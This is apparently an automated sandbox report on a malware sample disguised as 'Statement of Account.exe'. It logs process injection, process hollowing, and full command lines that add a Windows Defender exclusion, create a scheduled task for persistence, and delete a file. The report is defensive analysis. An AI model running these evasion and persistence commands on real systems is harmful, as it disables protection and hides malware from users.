          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D14F68 mov eax, dword ptr fs:[00000030h]6_2_05D14F68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF6F00 mov eax, dword ptr fs:[00000030h]6_2_05CF6F00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42F12 mov eax, dword ptr fs:[00000030h]6_2_05C42F12
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7CF1F mov eax, dword ptr fs:[00000030h]6_2_05C7CF1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6EF28 mov eax, dword ptr fs:[00000030h]6_2_05C6EF28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF6ED0 mov ecx, dword ptr fs:[00000030h]6_2_05CF6ED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46EE0 mov eax, dword ptr fs:[00000030h]6_2_05C46EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46EE0 mov eax, dword ptr fs:[00000030h]6_2_05C46EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46EE0 mov eax, dword ptr fs:[00000030h]6_2_05C46EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C46EE0 mov eax, dword ptr fs:[00000030h]6_2_05C46EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C78EF5 mov eax, dword ptr fs:[00000030h]6_2_05C78EF5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3AE90 mov eax, dword ptr fs:[00000030h]6_2_05C3AE90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3AE90 mov eax, dword ptr fs:[00000030h]6_2_05C3AE90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3AE90 mov eax, dword ptr fs:[00000030h]6_2_05C3AE90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72E9C mov eax, dword ptr fs:[00000030h]6_2_05C72E9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C72E9C mov ecx, dword ptr fs:[00000030h]6_2_05C72E9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCCEA0 mov eax, dword ptr fs:[00000030h]6_2_05CCCEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCCEA0 mov eax, dword ptr fs:[00000030h]6_2_05CCCEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCCEA0 mov eax, dword ptr fs:[00000030h]6_2_05CCCEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CDAEB0 mov eax, dword ptr fs:[00000030h]6_2_05CDAEB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CDAEB0 mov eax, dword ptr fs:[00000030h]6_2_05CDAEB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 2580
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: C30000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 9E0000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5209008Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 998008Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          Source: explorer.exe, 00000007.00000000.1738008014.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3108248750.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1743570907.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.1732859859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4165526139.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.4164952782.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1732420107.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000007.00000000.1732859859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4165526139.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.1732859859.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4165526139.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Users\user\Desktop\Statement of Account.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
